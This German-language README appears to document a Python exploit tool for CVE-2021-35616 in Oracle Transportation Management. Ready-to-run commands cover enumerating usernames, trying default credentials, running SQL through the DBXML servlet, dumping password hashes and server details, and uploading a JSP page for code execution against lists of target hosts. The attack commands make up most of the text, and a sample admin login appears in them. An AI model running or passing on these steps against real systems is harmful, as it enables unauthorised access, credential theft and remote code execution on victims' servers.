
Python-Tool zum Ausnutzen von CVE-2021-35616
Python-Tool zur Ausnutzung von CVE-2021-35616
Das Skript arbeitet in Modulen, die ich in der folgenden Reihenfolge implementiert habe:
► Benutzernamen-Enumeration
► Suche nach Standard-Anmeldedaten
► Ausführen einer SQL-Abfrage mit dem DBXML-Servlet
► Vollständige Ausnutzung und JSP-Ausführung
Die Syntax des Skripts lautet wie folgt:
.\OracleOTM.py {module} {host TXT file} {additional parameters}
Benutzernamen-Enumeration: .\OracleOTM.py enum {hosts TXT file} -u users.txt
Suche nach Standard-Anmeldedaten: .\OracleOTM.py default {hosts TXT file}
Ausführen einer SQL-Abfrage mit dem DBXML-Servlet: .\OracleOTM.py query {hosts TXT file} -uq EBS.ADMIN -pq Aa123123 -q "select 1 from dual"
Ich habe auch einige vordefinierte Abfragen vorbereitet, die ich nützlich fand; Sie können wie folgt direkt darauf zugreifen:
.\OracleOTM.py query {hosts TXT file} -uq EBS.ADMIN -pq Aa123123 -q os
OS – Extrahiert das Betriebssystem des Servers
Osuser – Extrahiert den OS-Benutzer, der die DB ausführt
Hostname – Hostname des DB-Servers
Hostip – IP-Adresse des DB-Servers
Passwords – Extrahiert die OTM-Benutzer und ihre gehashten Passwörter
Oraversion – Die DB-Version
Dbusershash – Die Passwort-Hashes der DB-Benutzer
Dbfileslocation – Der Speicherort der DB-Dateien im Betriebssystem
Vollständige Ausnutzung und JSP-Ausführung: .\OracleOTM.py exploit {hosts TXT file} -lu EBS.ADMIN -lp Aa123123 -pf "C:\Users\user\Desktop\Header_notepad.jspx"